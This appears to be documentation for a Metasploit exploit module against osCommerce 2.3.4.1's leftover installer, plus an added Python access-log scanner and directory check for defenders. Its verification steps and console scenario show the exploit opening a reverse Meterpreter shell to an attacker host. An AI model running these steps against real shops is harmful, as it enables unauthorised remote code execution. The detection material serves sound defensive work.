## Vulnerable Application

osCommerce version 2.3.4.1 is vulnerable to remote code execution. If the `/install/` directory was not removed after setup, an unauthenticated attacker can run the `install_4.php` script, which writes the configuration file for the installation. The attacker can inject PHP code into the configuration file through that script, and the injected code is then executed.
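
The defender-side counterpart of the condition above, as an added example that is not part of the module or of osCommerce: it parses Apache/nginx combined-format access log lines and flags any request to the installer directory after deployment, rating a successful POST to `install_4.php` (the step that writes the configuration file) highest, and it includes a filesystem check that the `install/` directory is actually gone. The log format, the document root argument and the sample log lines are assumptions constructed for the example.

```python
"""Defender-side checks for a leftover osCommerce /install/ directory."""
import os
import re

# Assumption: the web server writes the Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(rec):
    """Severity of one request, or None if it does not touch the installer."""
    path = rec["path"].split("?", 1)[0]
    if not re.search(r"(?:^|/)install/", path, re.I):
        return None
    # A successful POST to install_4.php is the step that (re)writes the
    # configuration file, which is exactly where injected PHP would land.
    if rec["method"] == "POST" and path.lower().endswith("/install_4.php") \
            and rec["status"].startswith("2"):
        return "high"
    return "medium"

def find_installer_hits(lines):
    """Scan log lines and return the installer requests with a severity attached."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        sev = classify(rec) if rec else None
        if sev:
            hits.append(dict(rec, severity=sev))
    return hits

def installer_dir_present(docroot):
    """Mitigation check: /install/ must be deleted from the document root after setup."""
    return os.path.isdir(os.path.join(docroot, "install"))

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Apr/2018:18:14:40 +0100] "GET /catalog/index.php HTTP/1.1" 200 5120',
    '10.0.0.9 - - [05/Apr/2018:18:14:44 +0100] "GET /catalog/install/ HTTP/1.1" 200 2210',
    '10.0.0.9 - - [05/Apr/2018:18:14:45 +0100] "POST /catalog/install/install_4.php HTTP/1.1" 200 1784',
    '10.0.0.5 - - [05/Apr/2018:18:15:01 +0100] "GET /catalog/product_info.php?products_id=1 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for hit in find_installer_hits(SAMPLE_LOG):
        print(f'{hit["severity"]:6} {hit["ip"]} {hit["method"]} {hit["path"]} -> {hit["status"]}')
```

Run it against the real access log (for example `find_installer_hits(open("/var/log/apache2/access.log"))`) and against the shop's document root; any "high" hit after go-live means the configuration file should be inspected for injected code.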

## Verification Steps

  1. Download and install [osCommerce 2.3.4.1](https://www.exploit-db.com/apps/ce2796b352d6e0fb4e9f03866ae98541-oscommerce-2.3.4.zip)
  2. `use exploit/multi/http/oscommerce_installer_unauth_code_exec`
  3. `set RHOST IP`
  4. `set PAYLOAD php/meterpreter/reverse_tcp`
  5. `set LHOST IP`
  6. `exploit`
  7. **Verify** a new Meterpreter session is started

## Scenarios

### osCommerce version 2.3.4.1 on Debian

```
msf > use exploit/multi/http/oscommerce_installer_unauth_code_exec
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set RHOST 172.16.40.188
RHOST => 172.16.40.188
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > exploit 

[*] Started reverse TCP handler on 172.16.40.5:4444 
[*] Sending stage (37543 bytes) to 172.16.40.188
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.188:47466) at 2018-04-05 18:14:45 +0100

meterpreter > sysinfo 
Computer    : oscommerce
OS          : Linux oscommerce 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64
Meterpreter : php/linux
meterpreter > 
```
